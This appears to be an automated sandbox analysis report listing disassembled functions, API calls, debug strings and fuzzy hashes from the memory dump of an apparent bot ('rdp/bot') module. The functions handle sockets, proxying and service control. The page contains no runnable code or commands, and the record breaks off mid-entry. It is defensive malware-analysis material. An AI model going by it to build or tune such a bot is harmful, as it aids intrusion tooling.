Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: _stricmp
String ID: (name != NULL)$C:/Projects/rdp/bot/codebase/scm.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$scm_find
API String ID: 2884411883-2863218139
Opcode ID: 9c744c752a8d13fac720ce47f4c91faa4cb8d9a72ad3e2420a16b255f704ab11
Instruction ID: c54abc5a251b96afdcd11d718d283a3013a3805821e74c1b75664122c62b7a13
Opcode Fuzzy Hash: 9c744c752a8d13fac720ce47f4c91faa4cb8d9a72ad3e2420a16b255f704ab11
Instruction Fuzzy Hash: C6011E69B0BA0E60FE5A8F50E46837662A0AF82B84F441431DA4E063E2FF2DE545C618

Function 00007FFDA55AAD75 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFDA55AAD96
WSAGetLastError.WS2_32 ref: 00007FFDA55AADB9

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

sock_close, xrefs: 00007FFDA55AADA4, 00007FFDA55AADC5
[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA55AADCC
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFDA55AADAB

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: ba9079067d19179ebe6bf6baf7c38d802999d82c0a886534fc5ab55fce1e80a4
Instruction ID: e9f42af2b3e6a9bcf609810d580586ba7fa3bda208f21903292cc242f67d04e9
Opcode Fuzzy Hash: ba9079067d19179ebe6bf6baf7c38d802999d82c0a886534fc5ab55fce1e80a4
Instruction Fuzzy Hash: 0EF09A2CF0A54F92EA025F65E8393B427109F17F71F140731D67D063E3AE6EA4468308

Function 00007FFDA55ACCAC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55ACCC6
DeleteCriticalSection.KERNEL32 ref: 00007FFDA55ACCF3

Strings

debug_cleanup, xrefs: 00007FFDA55ACD0B
Done, xrefs: 00007FFDA55ACD04
[I] (%s) -> %s, xrefs: 00007FFDA55ACD12

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: 0386638f395edafe5936c2303bdd69071192acad3c4db6da9497f3915dde1170
Instruction ID: fc9a47719e6080e8c3b955c0605f68437e61d27f067c4251bcd348a9cadc06f8
Opcode Fuzzy Hash: 0386638f395edafe5936c2303bdd69071192acad3c4db6da9497f3915dde1170
Instruction Fuzzy Hash: 90F09268B0B64B85FE469F90E8B937922A0AF57F04F550535C44D463A3DF7DA0498788

Function 00007FFDA55AAE46 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA55AAE6E
WSAGetLastError.WS2_32 ref: 00007FFDA55AAE85

Strings

tcp_set_keepalive, xrefs: 00007FFDA55AAE95
[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55AAE9C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 3af4584f76d2fb1eb2b8971791e2a72c24c52c03efe502b67099081bc507a2ff
Instruction ID: 2358a83b61d8a3d091b70a4a38de3c3dae03e1a47b1721e25605663e82b2cc6d
Opcode Fuzzy Hash: 3af4584f76d2fb1eb2b8971791e2a72c24c52c03efe502b67099081bc507a2ff
Instruction Fuzzy Hash: FDF02B75B0954A4AE3219F16F8142656650BF8AB60F008235EE2D83BE2DF7CC40ACB04

Function 00007FFDA55AA1DF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FFDA55AA215

Strings

[I] (%s) -> %s, xrefs: 00007FFDA55AA234
proxy_init, xrefs: 00007FFDA55AA22D
Done, xrefs: 00007FFDA55AA226

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CriticalDeleteSection
String ID: Done$[I] (%s) -> %s$proxy_init
API String ID: 166494926-991486753
Opcode ID: 4f71e2278afa38fab80a577d95c5849ae083bedf5349287d73a3270e4413966a
Instruction ID: 27bdf05ba7abae301916736368a323cfbffb82779e9e0d2cc30f9b0396117799
Opcode Fuzzy Hash: 4f71e2278afa38fab80a577d95c5849ae083bedf5349287d73a3270e4413966a
Instruction Fuzzy Hash: 2AF0A428B0BA4F84EA029F11E86937823A0BF42F44F824436C14E123A2EF2DB585D308

Function 00007FFDA55B4230 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFDA55B42AB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FFDA55B42C6
MultiByteToWideChar.KERNEL32 ref: 00007FFDA55B431A
_errno.MSVCRT ref: 00007FFDA55B4324

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: 81ec57064b8ca875c22becc66c91008ae0d2c7c680337a35ba01ac1b1b792e8e
Instruction ID: 1c91f7735694ea57e1bfc4c070f793aee1a7ebedbd2774c3bbc548a34815a1c6
Opcode Fuzzy Hash: 81ec57064b8ca875c22becc66c91008ae0d2c7c680337a35ba01ac1b1b792e8e
Instruction Fuzzy Hash: D231E779B0D285C6EF324F21A4183BD6A92AB56F84F098135DA88437D6EB3CD9418704

Function 00007FFDA55A89BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: 61e21130357b37cd81f6d1512ed87388e2a6a6d129d6e2aace3b4f80914820c7
Instruction ID: 00f1a4ed8fc63dd6ab0bacb9f96225f3ebd3da01cfbc2debe91e21f30068fe3c
Opcode Fuzzy Hash: 61e21130357b37cd81f6d1512ed87388e2a6a6d129d6e2aace3b4f80914820c7
Instruction Fuzzy Hash: 4E01A16AB0A20F56F67B6E5568B837A11916F43F14F080936CF1D463D3DD6EA8458208

Function 00007FFDA55A89AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: 1634e07a3328971604e5169c055727c2c513d5ed5b150af53c3d8470e1163217
Instruction ID: 34e60244f411173dbe1392bed15dce6eb75096c8ce3d87090d6e1490e3ced298
Opcode Fuzzy Hash: 1634e07a3328971604e5169c055727c2c513d5ed5b150af53c3d8470e1163217
Instruction Fuzzy Hash: D301C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D467D3DD6EE8458208

Function 00007FFDA55A89A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: b526e17983245773430d356cdc30f84027d352f6b6b6bfdf8799228e69828814
Instruction ID: 792e325ef03243799b72eb5030e343bbb68caee5aef415e1d834f67f38024971
Opcode Fuzzy Hash: b526e17983245773430d356cdc30f84027d352f6b6b6bfdf8799228e69828814
Instruction Fuzzy Hash: 9901C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208

Function 00007FFDA55A8997 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: 2e61b3f3e4032e7fa6d86b4fbe77a08d986a96dccc63925e0ee8d4b810f0da17
Instruction ID: 2333381ac9576d2ae3a832b882abc950f1c63464ae3261121fe4fee52aec6362
Opcode Fuzzy Hash: 2e61b3f3e4032e7fa6d86b4fbe77a08d986a96dccc63925e0ee8d4b810f0da17
Instruction Fuzzy Hash: 6C01C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208

Function 00007FFDA55A8A47 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: aa5773378fbe60be62a2ea5a99c298c9b8d1239413411f021b2dce72be0a71be
Instruction ID: 34e60244f411173dbe1392bed15dce6eb75096c8ce3d87090d6e1490e3ced298
Opcode Fuzzy Hash: aa5773378fbe60be62a2ea5a99c298c9b8d1239413411f021b2dce72be0a71be
Instruction Fuzzy Hash: D301C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D467D3DD6EE8458208

Function 00007FFDA55A8A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: 14c7d16f485ed253f5394b106dc1dafab8eff20a8f8c68b43e631369efa96124
Instruction ID: 792e325ef03243799b72eb5030e343bbb68caee5aef415e1d834f67f38024971
Opcode Fuzzy Hash: 14c7d16f485ed253f5394b106dc1dafab8eff20a8f8c68b43e631369efa96124
Instruction Fuzzy Hash: 9901C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208

Function 00007FFDA55A8A39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A8A73

Strings

scm_stop, xrefs: 00007FFDA55A83AA
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
API String ID: 1725840886-2743387298
Opcode ID: f4e7f931e504a2a1fb140ec50f24b7494d84318a6d3580a55bd1e54dbfbee568
Instruction ID: 2333381ac9576d2ae3a832b882abc950f1c63464ae3261121fe4fee52aec6362
Opcode Fuzzy Hash: f4e7f931e504a2a1fb140ec50f24b7494d84318a6d3580a55bd1e54dbfbee568
Instruction Fuzzy Hash: 6C01C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208

Function 00007FFDA55A224B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 0f39f8f63fdc324f6f824097126ab290aaa14f560813b898d1c3570f926614d2
Instruction ID: 1459a803e6e236a87b7a4c5b4d1591dab8ab2428c4d66a0e8bb144aef9e01e5b
Opcode Fuzzy Hash: 0f39f8f63fdc324f6f824097126ab290aaa14f560813b898d1c3570f926614d2
Instruction Fuzzy Hash: 75F05E2BF0B60B41F9579E04B56A7B911412F86F75E0A4931EE5C0B7C3EE3EA8829204

Function 00007FFDA55A2241 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2ba30e3a7e6572846da95a9fdedbe00157d52ad6fe00f33a7bce893260fb9bf9
Instruction ID: b8536d3c534875f7fdca097a18aee7be795346cbf00b3b0bc4423efd745160c8
Opcode Fuzzy Hash: 2ba30e3a7e6572846da95a9fdedbe00157d52ad6fe00f33a7bce893260fb9bf9
Instruction Fuzzy Hash: D5F0542BF0B60B41F9575E04756A7B911412F86F75E0A4931DE5C0B7C3EE3E68829204

Function 00007FFDA55A2255 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 252923cb569a6b484768e1c292ae1b9c31b0f94a5564cbb881ebf1110f5eaacc
Instruction ID: 9cbbb03314afacb2f28251cbe83a497c4f175c9891488a6b2fb9f8a1c3fd615b
Opcode Fuzzy Hash: 252923cb569a6b484768e1c292ae1b9c31b0f94a5564cbb881ebf1110f5eaacc
Instruction Fuzzy Hash: C6F0542BF0B60B41F9575E0475667B911412F86F75E0A4931DE5C0B7C3EE3E68829204

Function 00007FFDA55A265B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c40198cca18dccad730b46d64530ba81c5079ad8e15e9efb13706eec6c25bc73
Instruction ID: 793062fe52a452b1fa053d4580130518e988c425989a7ff83fe9f67208eee0ad
Opcode Fuzzy Hash: c40198cca18dccad730b46d64530ba81c5079ad8e15e9efb13706eec6c25bc73
Instruction Fuzzy Hash: 6DF0542BF0B50B41F9579E0474767B911412F82F64E0A4931DE5C0B7C3EE3E69829204

Function 00007FFDA55A2237 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

